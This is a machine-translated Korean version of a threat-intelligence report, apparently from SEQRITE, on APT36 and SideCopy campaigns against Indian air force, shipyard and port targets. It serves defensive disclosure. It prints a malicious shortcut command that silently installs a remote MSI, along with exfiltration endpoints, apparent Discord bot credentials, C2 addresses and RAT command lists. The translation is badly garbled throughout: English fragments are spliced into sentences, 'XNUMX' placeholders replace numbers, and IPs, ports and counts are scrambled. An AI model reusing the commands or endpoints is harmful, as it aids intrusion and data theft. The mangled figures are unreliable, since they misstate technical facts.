An 오픈 디렉토리 호스팅 악성 코드 연결 투명 부족(APT36)에게 에 의해 발견되었습니다 SEQRITE 랩스 APT 팀. F추가 분석 공개 숨겨진 URL이 on 같은 도메인 포함 페이로드 에 의해 사용되는 그 하위 부서 APT 그룹 사이드카피. 타겟팅 인도 정부 기관 등 비행기 힘, 조선소와 항만 by Si복사 취소 is 관찰 m을 통해여러 개의 오픈 디렉토리 그 주인ed 그것의 er 페이로드. 에이 강한 상관관계 전에,se 그룹 와 함께 러스틱웹; 웹사이트 통합을 원활하게 구현해드립니다. 도메인/IP, C2 name, 미끼 파일s, 더 보기 겹침 되었습니다 관찰. 이 블로그에서 우리는 탐험할 것이다 전에,se 페이로드 and 전에, ove랩 본 ...동안 전에, 최근 증가하다 in 그런 캠페인.
중요한 발견들
APT 오버랩
- 한 도메인에서 SideCopy와 APT36의 페이로드가 함께 호스팅되고 있으며, 각각 Windows와 Linux 환경을 표적으로 삼고 있는 것으로 나타났습니다.
- SideCopy의 RAT 페이로드에 사용되는 C2 서버는 일반적으로 APT9과 관련된 일반 이름(WIN-P5NRMH6G8M36)을 가지고 있습니다.
- 두 위협 그룹 모두 러스틱웹, 다양한 형식, 인프라 및 웹 서비스에서 동일한 유인 파일을 사용하여 감염 사슬을 구축하여 연결을 강화합니다.
사이드카피 감염
- SideWinder와 동일한 업데이트된 HTA를 사용하여 탐지를 회피함으로써 완전히 탐지 불가능하게 만들었습니다(FUD). SideCopy의 스테이저에서 SideWinder APT 그룹의 RTF 파일을 호스팅하는 인코딩된 URL이 발견되었습니다.
- 역방향 RAT는 '를 사용하여 MSI 패키지를 통해 전달됩니다.인도 공군 테마를 미끼로 사용했고, 메모리 내 역방향 RAT 변종도 발견되었습니다. DOTM 파일을 호스팅하는 다른 두 도메인에서 BAT 파일을 통해 역방향 RAT를 유포하는 더 많은 오픈 디렉터리가 발견되었으며, 이는 조선소와 항만을 표적으로 삼았습니다.
- Cheex라는 문서와 이미지를 훔치는 데 사용되는 새로운 페이로드, 첨부된 드라이브에서 파일을 훔치는 USB 복사기, FileZilla 애플리케이션 및 SigThief 스크립트도 발견되었습니다.
- 파키스탄 지역에서 안티바이러스를 대상으로 스테이저 우회 테스트가 진행 중인 것으로 확인되었습니다. 동시에, 일반적으로 독일 C2에서 관찰되는 인도 발 피해자 트래픽은 파키스탄 IP에서 IPsec 프로토콜을 통해 라우팅되고 있습니다. 브로페서 Team Cymru에서.
- HTA의 메모리 내에서 실행되는 Geta RAT라는 새로운 .NET 기반 페이로드는 Async RAT의 브라우저 도용 기능을 통합합니다. Action RAT는 병렬로 사이드로딩됩니다. 참마.exe 대신에 credwiz.exe/reykeywiz.exe 그리고 다음과 같은 이름의 허니트랩 테마를 사용합니다. '왓츠앱 이미지' 보인다.
투명한 부족 감염
- Linux 시스템을 대상으로 하는 Golang 기반 다운로더는 Google Drive에서 최종 페이로드를 가져오는 데 사용됩니다. 이 최종 페이로드는 최근 도메인에서 가져온 것으로 확인되었으며, 디스고모지 Volexity에서는 "SideCopy와의 약한 인프라 연결"이 언급되었습니다.
- 그룹은 Poseidon이 유혹적인 테마를 가진 바탕 화면 바로 가기를 사용하여 Linux 플랫폼을 계속 표적으로 삼고 있습니다. 'P오스팅/Ph-III에 따른 이전 R회전식 T를 ransfer' 'TLP 및 날짜를 사용하여 IP 주소를 블랙리스트에 추가' 그리고 '장기요양 체크리스트'.
- Crimson RAT의 사용 '우타라칸드 선거 결과' 'TDS 청구 요약' FileZilla 애플리케이션을 내장한 미끼도 관찰되었습니다.

그림 1 – 중복되는 감염 사슬
중첩 공격
오픈 디렉토리에서 발견된 도메인은 다음과 같습니다. 캠퍼스 포털[.] 여러 폴더가 호스팅되어 있습니다. 이 폴더에는 APT36에 기인한 Golang 기반 Linux 페이로드가 포함되어 있지만, 동시에 SideCopy APT에 속하는 HTA 스테이저를 호스팅하는 여러 개의 숨겨진 URL이 발견되었습니다. 이 도메인은 원래 다양한 인도 입학 시험 안내용으로 사용되었으며, 트위터/유튜브에 마지막으로 게시된 것은 2016년이었습니다. 유사한 오픈 디렉토리도 있었습니다. 관찰 동일한 소프트웨어에서 이전에 SideCopy 스테이저를 호스팅했습니다. LiteSpeed 웹 서버. 이 경우 도메인은 리뷰할당[.]에서 유아교육 및 보육 서비스에 대한 또 다른 교육 포털에도 사용되었습니다.

그림 2 – SideCopy 스테이저를 사용하여 APT36 및 숨겨진 URL을 호스팅하는 Open Directory
디렉터리 중 하나에 ZIP 아카이브가 있는데, 여기에는 암호로 보호된 PDF 파일과 UPX로 압축된 ELF 바이너리가 포함되어 있습니다. 압축을 풀면 다운로더 역할을 하는 Golang 바이너리가 나타나는데, 이 바이너리는 먼저 암호 '745414'. 미끼 주제는 2023년 XNUMX월 이후 SideCopy가 진행한 여러 캠페인에서 관찰된 인터넷 사용에 대한 설문 조사입니다.

그림 3 – 인터넷 설문조사 유인물
그런 다음 Google Drive에서 다음 단계 페이로드를 다운로드합니다. 그누코어인포 숨겨진 디렉토리로 .x86_32-linux-gnu, 실행 가능하게 만들고 백그라운드에서 시작합니다. 지속성은 다음과 같은 두 개의 AutoStart 데스크톱 항목을 통해 설정됩니다. GNOME_Core.desktop GNULib_Update.desktop. bash 스크립트가 삭제되고 등록됩니다. 크론 아래에 표시된 대로 페이로드를 다운로드하고 중복 프로세스가 실행되지 않도록 하는 작업입니다.

그림 4 – 지속성 스크립트의 Golang 다운로더 프로세스
DISGOMOJI의 변형
최종 페이로드는 '라는 이름의 UPX로 압축된 Golang 기반 ELF 바이너리입니다.vmcoreinfo.txt'. 이것은 오픈소스 저장소를 기반으로 하는 원격 액세스 트로이 목마입니다. 불일치-c2Discord 서버를 C2로 사용하고 이모티콘을 사용하여 소통합니다. 볼 렉스 Discord 서버의 서버 ID와 봇 토큰이 런타임에 하드코딩되거나 다운로드되는 DISGOMOJI의 다양한 변형을 관찰했습니다. BID1.txt GID1.txt 에 ordai[.]quest. 이 버전에서는 Google Drive를 사용하여 다음 이름을 사용하여 두 번째 서버임을 나타냅니다.
| 파일 이름 | 자세한 내용 및 Google 드라이브 다운로드 링크 |
| BID2.txt | MTI0NjkwMDE2NTI1MjQ4NTM1Mg.GWqtv3.cZmv1ZIts2ClyZ6jcKKpRzkD_hChmEkfDcZKeM (Server ID) |
| hxxps://drive.google.com/uc?export=download&id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe | |
| GID2.txt | 1246900038160879688 (봇 토큰) |
| hxxps://drive.google.com/uc?export=download&id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t | |
| GTK 테마 파싱.txt | 2bf596603c432fa46b494dc3edd2d30f (MD5) |
| hxxps://drive.google.com/uc?export=download&id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_ |
존재하는 모든 오류 처리 메시지는 실제 기능에서 오도하려고 하지만 흥미로운 오류 이름 중 하나가 관찰됩니다.업데이트 오류 카바치 저장소: %v". 난독화된 파일 이름 GTK 테마 파싱.txt 다운로드되며, 연결된 USB 드라이브에서 로컬 디렉터리로 파일을 주기적으로 복사합니다. 크론 작업도 마찬가지로 영구적으로 유지되도록 설정되며, 이 파일은 이모티콘 기반 RAT를 사용하여 유출될 수 있습니다.

그림 5 – 난독화된 USB 도용 스크립트
DISGOMOJI는 처음에 기본 시스템 세부 정보를 수집하며 그 기능에는 스크린샷 찍기, 명령 실행, 웹 서비스에 파일 업로드가 포함됩니다.오시[.]앗 전송[.]sh), 디스코드 서버를 통해 파일을 다운로드 및 업로드하고, Firefox 브라우저 프로필을 가져오고, 확장자를 기반으로 파일을 찾아 유출할 수 있습니다. 마지막 항목은 펀자브어(파키스탄에서 가장 많이 사용되는 언어)로 "모든 지식을 알려드렸으니, 또 무엇을 원하십니까?"라는 의미의 고유 문자열을 가지고 있으며, 이는 데이터 유출에 적합합니다. 새로운 Windows 및 Linux 변종 PYSHELLFOX와 GLOBESHELL BlackBerry는 파일을 유출하고 Firefox 프로필을 훔쳤다고도 언급했습니다.

그림 6 – 유출 메시지
포세이돈의 변종
또한 Transparent Tribe의 Linux 데스크톱 바로 가기를 통해 Poseidon 에이전트의 지속적인 배포를 관찰했으며, 미끼 파일은 Google Drive에 유사하게 호스팅되었습니다. 피쿠마트리 gmail.com 핏팔콘0900 gmail.com 계정 소유자로서. The 세 다른 미끼 관찰 are 모두 다양한 인도 정부 문서와 관련이 있습니다. 이것들은 오스팅/이전 임원들의 부처 산하 국방 작년부터, 블랙리스트에 등록된 IP 주소 과 티엘피(TLP) & 날짜와 수표k LTC 청구 목록.

그림 7 – 포세이돈을 이용한 IP 블랙리스트 미끼(1)

그림 8 – 포세이돈을 포함한 체크리스트 미끼(2)

그림. 9 - 게시/전송 포세이돈이 있는 미끼(3)
사이드카피
최근 SideCopy 감염에서 발견된 URL을 기반으로, 유사한 HTA 스테이저 호스팅과 동일한 미끼가 확인되었습니다. 감염은 보관된 바로가기 파일로 시작되며, 이 파일은 동일한 도메인에 호스팅된 원격 HTA 파일을 실행하기 위해 MSHTA 프로세스를 시작합니다. 총 6개의 HTA 파일이 발견되었으며, 1.hta or 2.hta. 첫 번째 HTA 변종에는 두 개의 base64 디코딩 함수가 있는데, 하나는 JavaScript 기반이고 다른 하나는 ActiveX 객체를 사용합니다. .NET 버전 확인, AV 솔루션 설치, 페이로드 연결 및 문자열 디코딩, 그리고 마지막으로 DLL을 메모리 내에서 실행하고 디코이 파일을 전달하는 등 기능은 동일하게 유지됩니다.

그림 10 – HTA 스테이저 2nd 다른
두 번째 HTA 변종은 매우 난독화되어 있으며 작년부터 여러 기술을 사용하는 특정 시기에만 관찰되었습니다.
- 사용자 정의 알파벳을 사용하여 base64와 유사한 인코딩된 문자열을 디코딩합니다.
- XOR 기반 복호화(키: f551e832 및 bWqQ)
- 1/2/5 문자마다 문자열 반전
- 여러 키를 사용한 카이사르 암호 변환

그림 11 – HTA의 난독화 해제
전반적인 기능은 동일하게 유지되지만, 이러한 난독화 패턴은 작년부터 SideWinder APT의 HTA에서 발견되었습니다. 스크립트 어디에도 사용되지 않는 문자열에는 URL(cabinet-gov-pk[.]ministry-pk[.]net) 몇 년 전 SideWinder의 RTF 파일을 호스팅했던 곳입니다.

그림 12 – SideWinder URL을 사용한 SideCopy 스테이저(분석에서 얻은 의견)
인 메모리 프리보타 DLL은 디코이를 열고 AV 솔루션을 설치하는 일반적인 순서를 수행합니다. AV 솔루션에 따라, 예약된 작업(VBScript), 실행 레지스트리 키 또는 시작 바로 가기의 조합으로 지속성을 설정합니다. 궁극적으로 두 개의 추가 HTA 파일을 삭제하거나 ''에서 MSFTEDIT.dll(Action RAT)을 다운로드합니다.hxxps://campusportals.in//files//documents//backup//ap.txt' 측면에 로드된 참마.exe C64.188.27의 포트 144에서 5863[.]2에 연결됩니다.

그림 13 – SideWinder 도메인 호스팅 RTF 파일
삭제된 HTA 파일의 이름은 useH, useT, alphaT이며, 위에서 언급한 것과 동일한 HTA 기능을 가지고 있으며, 마지막에 메모리 내에서 DLL을 실행합니다. 두 개의 서로 다른 DLL이 발견되었는데, 하나는 C19용 명령 2개와 USB 파일 그래버를 포함하는 Reverse RAT입니다. 이 DLL은 새 드라이브가 연결될 때마다 파일과 폴더를 저장합니다. 두 번째는 C30용 명령 2개를 포함하는 새로운 .NET 기반 Geta RAT로, Firefox와 Chromium 기반 브라우저의 모든 계정, 프로필, 쿠키 데이터를 훔칠 수 있습니다. 이 브라우저 플러그인은 아래와 같이 Async RAT에서 차용되었습니다.

그림 14 – Geta RAT 대 비동기 RAT
| 아니 | Command | 기능 |
| 1 | 연결 끊김 | 연결을 닫습니다 |
| 2 | 시스템 정보 | 시스템 데이터(컴퓨터 이름, 사용자 이름, 화면 크기, 사용 가능한 메모리 및 총 메모리(물리적 및 가상), OS 세부 정보, 배터리 전원 상태, 시스템 가동 시간, 드라이버, 네트워크 세부 정보)를 가져옵니다. |
| 3 | 피킬 | 특정 프로세스를 종료하고 프로세스 목록을 가져옵니다. |
| 4 | 프로세스매니저 | 프로세스 목록 가져오기 |
| 5 | 소프트웨어 | 설치된 소프트웨어 받기 |
| 6 | 암호 | 모든 계정/프로필/쿠키에서 Firefox 및 Chromium 기반 브라우저 자격 증명을 가져옵니다. |
| 7 | RD | 원격 데스크톱 스크린샷 가져오기 |
| 8 | GetPcBounds | 화면 크기 가져오기 |
| 9 | 현재 위치 설정 | 커서 위치 설정 |
| 10 | GetHostsFile | \etc\hosts 파일을 가져옵니다 |
| 11 | 호스트 파일 저장 | 지정된 위치에 \etc\hosts 파일을 저장합니다. |
| 12 | GetCPText | 클립보드 내용 가져오기 |
| 13 | CP텍스트 저장 | 지정된 위치에 클립보드 내용 저장 |
| 14 | 껍질 | "cmd /C"를 통해 명령을 실행합니다. |
| 15 | 녹음 시작 | 정의된 기능은 없지만 화면 캡처에 사용될 가능성이 가장 높습니다. |
| 16 | 녹음 중지 | 정의된 기능은 없지만 화면 캡처에 사용될 가능성이 가장 높습니다. |
| 17 | 녹음다운로드 | 정의된 기능은 없지만 화면 캡처에 사용될 가능성이 가장 높습니다. |
| 18 | 드라이브 목록 | 드라이브 목록 가져오기 |
| 19 | 파일 목록 | 지정된 경로에 대한 파일 및 디렉토리 가져오기 |
| 20 | mkdir | 새 디렉토리 생성 |
| 21 | rmdir | 디렉터리 삭제 |
| 22 | rn폴더 | 디렉토리 이름 바꾸기 |
| 23 | MVD | 디렉토리 이동 |
| 24 | rmfile | 파일 삭제 |
| 25 | rn파일 | 파일 이름 바꾸기 |
| 26 | 공유 파일 | 파일 다운로드 |
| 27 | 운영 | 파일 실행 |
| 28 | 실행하다 | 1. DLL 사이드 로딩을 통해 파일을 업로드하고 실행합니다. 2. "cmd /C netstat -ano"를 실행하여 서버 IP의 연결 상태를 가져옵니다. 3. AV 설치하기 |
| 29 | addSys | 레지스트리 또는 시작을 통해 지속성 설정 |
| 30 | 파일 업로드 | 파일을 올리다 |
CACTUS TORCH와 SILENT TRINITY를 닮은 두 가지 유사한 HTA 변종이 발견되었지만, 탐지를 완전히 피했습니다. 이들은 바로가기 파일을 통해 실행되며, 허니트랩과 미·중 교착 상태와 같은 공격 기법을 활용하여 최종 페이로드를 투하합니다.

그림 15 – 새로운 HTA 스테이저
이 새로운 HTA에서 발견된 차이점은 기능은 동일하게 유지된다는 것입니다.
- Base64 디코딩 외에도, 지정된 길이의 데이터를 디코딩하는 또 다른 함수가 사용됩니다. 주로 내장 DLL은 이러한 함수를 사용하여 두 번 인코딩됩니다.
- 디코이 DLL과 사이드로딩 DLL은 HTA에 별도로 내장되지 않고 .NET DLL 자체에 내장됩니다.
- AV를 설치하기 위해 WMI 쿼리를 사용하지 않으며, .NET 버전을 가져오기 위해 VBScript를 사용하지 않습니다.
- 중요한 점은 인스턴스를 생성하고 동적으로 호출하기 위한 대상이 지정되지 않았다는 것입니다.

그림 16 – 단순화된 HTA 버전
로딩 대신 프리보타 or SummitOfBion 메모리 내, BroaderAspect.dll 디코이를 삭제하고 여는 위치가 보입니다. 바이러스 백신 검사는 수행되지 않지만 레지스트리 실행 키는 지속성으로 설정되고 DLL(DUser.dll)은 다음을 통해 사이드로드됩니다. Rekeywiz대상 디렉토리는 'C:\Users\Public\BroadCastUSB\crezly.exe'이고 두 파일에 연결된 PDB 경로는 'E:\TestAssembly\obj\Debug\BroaderAspect.pdb'입니다.

그림 17 – MSHTA의 메모리 내에서 실행되는 DLL
역방향 RAT 캠페인
다양한 조선소, 항구, 심지어 공군과 관련된 미끼와 가짜 도메인을 이용한 역방향 RAT 감염 사례가 다수 관찰되었습니다. 이러한 모든 기관은 인도 정부 산하 국방부(MoD)와 항만·해운·수로부(MOPSW) 산하입니다.

그림 18 – 역방향 RAT 감염 및 표적
Reverse RAT의 독립형 변형은 동일한 타임라인 동안 MSI 패키지를 통해 배포됩니다. ZIP 파일 이름은 '2024 회계연도 급여 인상'에는 MSI 패키지를 다운로드하고 실행하기 위한 LNK 바로 가기가 포함되어 있습니다.
- C:\Windows\System32\cmd.exe /cm^s^i^e^x^e^c.exe /q /i hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/
이 패키지는 아래 이미지와 같이 사용자 지정 작업 및 설치 과정에서 실행되는 .NET Confuser PE 파일로 구성됩니다. 역방향 RAT는 "C:\\ProgramData\\VSUpdates\\svirbre.exe” C19에 대한 동일한 2개 명령과 이에 대한 지속성은 다른 HTA 스크립트를 통해 설정됩니다. 파일로스.hta 실행 레지스트리 키를 사용하여.
| 아니 | Command | 기능 |
| 1 | 운영 | 파일 실행 |
| 2 | 명부 | 경로의 파일 또는 디렉토리 나열 |
| 3 | 피킬 | 실행중인 프로세스를 종료합니다 |
| 4 | 가까운 | C2와의 연결을 닫습니다 |
| 5 | 이름 변경 | 파일 이름 바꾸기 |
| 6 | 화면 | 스크린 샷 찍기 |
| 7 | 업로드 | C2에 파일 업로드 |
| 8 | 삭제 | 파일 삭제 |
| 9 | 등록하다 | 모든 레지스트리 키와 해당 값을 나열합니다. |
| 10 | 방법 | 실행 중인 모든 프로세스 나열 |
| 11 | 프로그램 | 설치된 모든 프로그램 나열 |
| 12 | 다운로드 | C2에서 파일 다운로드 |
| 13 | 생성 디렉토리 | 새 디렉토리 생성 |
| 14 | 셸 실행 | cmd.exe를 사용하여 명령을 실행하거나 파일을 엽니다. |
| 15 | 레그뉴키 | 새 레지스트리 키 만들기 |
| 16 | 클립 보드 | 클립보드 내용을 검색합니다 |
| 17 | 레그델키 | 레지스트리 키 삭제 |
| 18 | 다운로드exe | 파일 다운로드 및 실행 |
| 19 | 클립보드 세트 | 클립보드 내용 설정 |

그림 19 – 역방향 RAT를 삭제하는 MSI 패키지
감염 사슬과 페이로드는 다음과 같습니다.
| 파일 이름 | 세부 정보 |
| 급여_인상_FY_2024.zip | 수정일자 : 2024-06-03 |
| 급여 인상률 2024.pdf.lnk | 기계 ID: cop125n, 수정 날짜: 2023-12-04 |
| newpictures.png (MSI) | 수정일: 2020-09-18, 작성자: MSTech Soft |
| Filmeos.exe | .NET 컨퓨저 1.x |
| svirbre.exe(역방향 RAT) | 키: winupdates@7 C2: defender.windowupdatecache[.]in/officialupdates |
유출된 미끼에는 인도 공군 직원들에게 지급된 급여 인상 내역이 포함되어 있었습니다. 최근 문서로, 지급일을 2024년 XNUMX월로 명시하고 있습니다.

그림 20 – 인도 공군 급여 미끼
더 많은 오픈 디렉토리
7월에는 오픈 디렉토리를 가진 두 개의 도메인이 추가로 발견되었는데, 타임스탬프에서 확인된 바와 같이 신규 및 기존 SideCopy 페이로드를 모두 호스팅하고 있었습니다. 여기에는 역방향 RAT 캠페인에 사용된 여러 EXE, PNG, PDF, BAT 및 기타 문서가 포함되어 있습니다. 해당 도메인은 슬라이드파인더[.]닷컴 다른 도메인에서 페이로드를 가져오는 호스팅된 7월 샘플 마자곤독[.]닷컴, 2023년 XNUMX월에 템플릿 주입 공격을 위해 파일을 호스팅했습니다.

그림 21 – SideCopy 페이로드를 호스팅하는 오픈 디렉토리
두 개의 매크로 활성화 템플릿 문서가 명명됨 Aerospace.dotm tmps.dotm 감염 사슬이 시작되는 것이 관찰되었습니다. 문서를 열면 난독화된 서브루틴이 실행되어 호스팅된 PNG 파일을 일괄 스크립트로 다운로드합니다.08973422348.batHTTP 응답이 200이면 TEMP 디렉토리에 "를 저장합니다. 파일이 있으면 Shell 함수를 사용하여 배치 파일을 실행합니다.

그림 22 – 템플릿 문서의 VBA 매크로
템플릿 중 하나에서는 나중에 활성 문서의 첨부된 템플릿을 변경하는 UNLK 서브루틴을 호출합니다. Normal.dotm 사용자 디렉터리에 있는 템플릿을 다운로드한 후 변경 사항을 저장하지 않고 문서를 닫습니다. 오류가 발생하면 DVBP 서브루틴을 호출하여 문서에서 모든 VBA 구성 요소를 제거하여 모든 VBA 코드를 삭제합니다. 아래 배치 스크립트는 기본적으로 다음을 사용하여 역방향 RAT 페이로드를 PNG 형식으로 다운로드합니다. PowerShell을, 숨겨진 디렉토리에 복사하고 5분마다 실행되는 예약된 작업을 만듭니다.

그림 23 – 역방향 RAT를 다운로드하기 위한 배치 스크립트
미끼 파일 편지002.pdf 또한 동시에 다운로드 및 열람이 가능하며, 이는 2024년 XNUMX월 당시 항만·해운·수로부 산하 코친 조선소(Cochin Shipyard Limited)의 계약 세부 정보와 일치합니다. 이 모든 월별 계약 세부 정보는 다음과 같습니다. 공개적으로 합법적인 도메인에서. 19개 명령을 수신하는 것 외에도 Reverse RAT는 다른 파일을 다운로드합니다. 마자곤독[.]닷컴 도메인은 국방부의 공식 Mazagon Dock Shipbuilders Limited를 모방합니다. 마자곤독[.]인 웹사이트. 이 도메인 호스팅 페이로드는 2023년 2월 캠페인에서도 유사한 타겟팅으로 Revere RAT를 전송하는 것으로 관찰되었습니다. Reverse RAT에서 확인된 CXNUMX는 vocport[.]com/Contactus, 이는 항만, 해운, 수로부 산하 VO 치담바라나르 항만 당국의 도메인을 모방한 것입니다.

그림 24 – 코친 조선소 계약 세부 정보가 포함된 미끼
.NET의 점점 더 많은
특정 확장자를 가진 파일을 검색하고 저장하는 기능을 갖춘 새로운 .NET 기반 페이로드가 다운로드 및 실행됩니다. 이 페이로드는 이후 다음 서버로 유출되는데, 두 가지 샘플에서 확인할 수 있습니다.
- hxxp://149.28.95.195/dakshf_upload.php
- hxxps://googleservices[.]live/dakshf_upload.php
이 샘플에는 사용자 이름 "아래 소스 프로젝트의 PDB 경로도 포함되어 있습니다.죽은 뱀” cheex라는 이름을 가진 (이 이름을 사용하는 관련 없는 온라인 플랫폼이 존재합니다.) 12개의 폴더(바탕화면, 개인 문서, 일반 문서, 다운로드, 최근 문서)에서 DOCX, DOC, XLSX, XLS, PPTX, PPT, PDF, BAK, JPEG, JPG, PNG, TXT 등 XNUMX개 확장자를 가진 파일을 검사합니다.
| C:\Users\Dead Snake\source\repos\cheex-folderwise\cheex\obj\Release\dlhost.pdb |
| C:\Users\Dead Snake\source\repos\cheex\cheex\obj\Debug\cheex.pdb |

그림 25 – 파일 침출을 위한 새로운 페이로드
MSI를 통해 제공된 위의 Reverse RAT에서 볼 수 있듯이, 연결된 USB 장치에서 파일 유출 기능이 포함되어 있었지만, 이제는 완전히 별도의 모듈로 제공됩니다. 모든 드라이브 문자가 열거되고, 파일은 동일한 IP 주소에 업로드되기 전에 백그라운드 워커를 사용하여 TEMP 디렉터리에 복사됩니다. 두 샘플에서 관찰된 PDB 경로는 다음과 같습니다.
| e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Release\AdobeReaders.pdb |
| e:\DBD\MA\Miscelleneous\Usb-Copier\Usb-Copier\FileCorrupter\obj\x86\Debug\AdobeReaders.pdb |
관찰된 다른 파일에는 매크로가 활성화된 문서, 미끼, FileZilla 애플리케이션(파일 전송에 사용됨) 및 오픈 소스 Python 스크립트가 있습니다. 시그시프 서명을 훔치고 추가하는 데 사용되었으며 이전 캠페인과 관련하여 호스팅되었습니다.
- 해군 프로젝트 지불 섹션 보고서 29092023.docx
- 해군 프로젝트 지불 섹션 보고서 131023.docx
- 프로젝트 및 서비스 섹션 보고서 10102023.docx
- 편지002.pdf
- 해군 프로젝트.pdf
2023년 캠페인에 사용된 다른 미끼 문서도 같은 도메인에서 발견되었습니다. 이는 정부 VO 치담바라나르 항만청의 입항 허가 및 해군 프로젝트 관련 공급업체의 송장 상태와 관련이 있습니다. 이러한 미끼 문서는 공개적으로 사용 가능한 문서.

그림 26 – 2023년 XNUMX월 캠페인의 해군 항구 테마 미끼

그림 27 – 2023년 XNUMX월 캠페인의 해군 프로젝트 청구서 테마 미끼
인프라 및 귀속
지금까지의 분석 결과, 파키스탄과 연계된 세 개의 APT 그룹 간에 중복되는 부분이 발견되었습니다. Transparent Tribe는 Golang, Python 등 다양한 기법과 언어를 사용하는 것으로 알려져 있으며, Operation RusticWeb은 Rust 기반 페이로드를 사용했습니다. 두 그룹 모두 오시[.]앗 웹 서비스, 두 개의 동일한 PDF 미끼 문서 및 해당 가짜 도메인은 BlackBerry와 Volexity에서 관찰한 것과 동일한 IP 주소로 확인되었습니다.

그림 28 – 파키스탄 APT 중복
마찬가지로 SideCopy와 APT36 사이의 중복은 미끼와 같은 것으로 관찰되었습니다. 리눅스 스테이저 각각 Ares RAT와 Poseidon을 투하하기 위해 탑재량은 다음과 같습니다. 알라코어 RAT C2의 일반 명칭입니다. RusticWeb은 APT36과 중간에서 높은 신뢰도로 직접 연결되어 있으며, SideCopy가 APT36의 하위 팀 역할을 하는 것과 유사합니다.
페이로드를 호스팅하는 데 사용되는 가짜/침해된 도메인은 다음 IP 주소로 확인되며, 그 중 두 개는 WIN-BEJO0EMFO5K라는 일반 이름을 가지고 있습니다.
| 도메인 | IP | ASN |
| 캠퍼스 포털[.] | 192.64.117[.]203 | AS22612 – 네임칩 |
| 마자곤독[.]닷컴 | 172.67.217[.]17 CN=WIN-BEJO0EMFO5K |
AS13335 – 클라우드플레어 |
| 슬라이드파인더[.]닷컴 | 103.133.215[.]65 CN=WIN-BEJO0EMFO5K |
AS133643 – Ewebguru, 인도 |
| dipl[.]사이트 | 151.106.117[.]91 | AS47583 – 호스팅어 |
| utkalsevasamitikanjurmag[.]in | 162.0.209[.]114 | AS22612 – 네임칩 |
C2 서버를 살펴보면 IP 64.188.27[.]144 동일한 포트에서 Action RAT 및 Geta RAT와 함께 사용되었지만 Reverse RAT C2도 사용되었습니다. checkdailytips.servehttp[.]com 해당 IP로 확인되었습니다. 이와 관련된 일반 이름 WIN-P9NRMH5G6M8 APT2의 대부분 C36 서버에서 발견되었습니다.

그림 29 – APT36의 일반 이름을 가진 IP
도메인 vocport[.]com 2023년 2월부터 과거 캠페인과 마찬가지로 현재에도 사용되고 있습니다. 관찰된 모든 CXNUMX 서버의 Whois 세부 정보와 해당 페이로드는 다음과 같습니다.
| IP | ASN | Payload |
| vocport[.]com 104.21.40[.]190 172.67.156[.]79 |
AS13335 – 클라우드플레어 | 역방향 RAT |
| defender.windowupdatecache[.]in 172.67.128[.]127 |
AS13335 – 클라우드플레어 | 역방향 RAT |
| checkdailytips.servehttp[.]com dns1.indianblog[.]xyz 64.188.27[.]144 |
AS8100 – QuadraNet
CN=WIN-P9NRMH5G6M8 |
리버스 RAT, 액션 RAT, 게타 RAT |
| googleservices[.]live 149.28.95[.]195 |
AS13335 – 클라우드플레어 AS20473 – 추파 |
치즈, USB 복사기 |
| 84.247.170[.]237 | AS51167 – 컨타보 | 새로운 RAT |
| 165.22.221[.]71 178.128.166[.]148 152.42.162[.]105 161.35.207[.]209 159.65.146[.]80 157.245.100[.]177 |
AS 14061 – 디지털오션 | 포세이돈 |
이러한 상관관계와 이전 공격 체인을 기반으로, 이러한 캠페인은 APT36와 SideCopy 그룹 모두에 기인한 것으로 높은 신뢰도로 판단되며, 두 그룹 사이에 또 다른 강력한 연관성이 확립되었습니다.
맺음말
파키스탄 APT 그룹과 연계된 스테이저/페이로드를 호스팅하는 여러 개의 오픈 디렉토리가 발견되었으며, 이 디렉토리는 인도 공군, 정부 기관 산하 항만 및 조선소를 표적으로 삼았습니다. Transparent Tribe, SideCopy, RusticWeb 간에 중복되는 부분이 발견된 다양한 사이버 작전이 관찰되었습니다.
APT36은 주로 리눅스 시스템을 표적으로 삼는 반면, SideCopy는 윈도우 시스템을 표적으로 삼아 새로운 페이로드를 추가하고 있습니다. 2024년 XNUMX분기에는 안드로이드 기반 악성코드를 사용하는 파키스탄 연계 위협 그룹이 인도를 표적으로 삼는 사례가 보고되었습니다. 여기에는 셀레스티얼 포스 작전(Operation Celestial Force)이 포함됩니다. 우주 표범 그리고 또 다른 새로운 그룹 WhatsApp을 활용하여 전달 스파이노트 RAT. 인도에 대한 지속적인 사이버 공격에 대비하여 필요한 예방 조치를 취하고 안전을 유지하는 것이 좋습니다.
SEQRITE 보호
- 링크.사이드카피.48846.Gen_GC
- MSI.사이드카피.48847.GC
- JS.사이드카피.48848.Gen_GC
- 문서.APT36.48849.GC
- ELF.에이전트.48863.GC
- ELF.에이전트.48860.GC
- O97M.드로퍼.DZ
- BAT.다운로더.48924
- XML.사이드카피.48922
- XML.사이드카피.48923
- 트로이 APT.ReverseRAT.S33893087
IOC
사이드카피
| HTA | |
| ced11422832a7380381323ae78a7a9bc f270105309e6574cab7a6acb1efb3c20 c574b2ebcc0aff84a23f1215f8a803be |
1.hta |
| 4938f42a3d691ef78f1ee8edc3b38f87 817532c454637a302238a4751694c336 e2f8fbc105a84283e191362f4ca07ae4 |
2.hta |
| 7c3b49f642f19116878b2c190f344f63 | 알파T.hta |
| f6a58b0d267c7c53ccbcc6dafafd499b f55afc8192f30ff7a584dbda700383d1 |
useH.hta |
| d6ae362b4b3f7a67949d177fdfc6bdec | useT.hta |
| 907ba4486c589f2cb4a45b92f2a5350e | 이미지12542.hta |
| 336316c1b5ed77d31b4adc06e06a2f84 | ugt254d.hta |
| LNK | |
| f60c1a04161f354f0c6ac4678b3062d0 | 급여 인상률 2024.pdf.lnk |
| 4dfdacf33db6ae0341b4d0e65aa3d755 | WhatsApp_Image_2024-05-06.lnk |
| 2041d2347f78ce03c1f9e990724adf3c | 미국-중국-대치-인도-기회-차다-21-23월-XNUMX.lnk |
| ZIP | |
| fe8bf0bf2697d5e43e38d4b0364485a6 | 급여_인상_FY_2024.zip |
| b99717d81e142e58af91efb4d5288bda | WhatsApp_Image_2024-05-06.zip |
| 109897ba1f92339f9dc9a74dc38dfc88 | 미국-중국-대치-인도-기회-차다-21-23월-XNUMX.zip |
| 말독 | |
| 807e6c1094b760e748a84ef9e05bc1f8 | Aerospace.dotm |
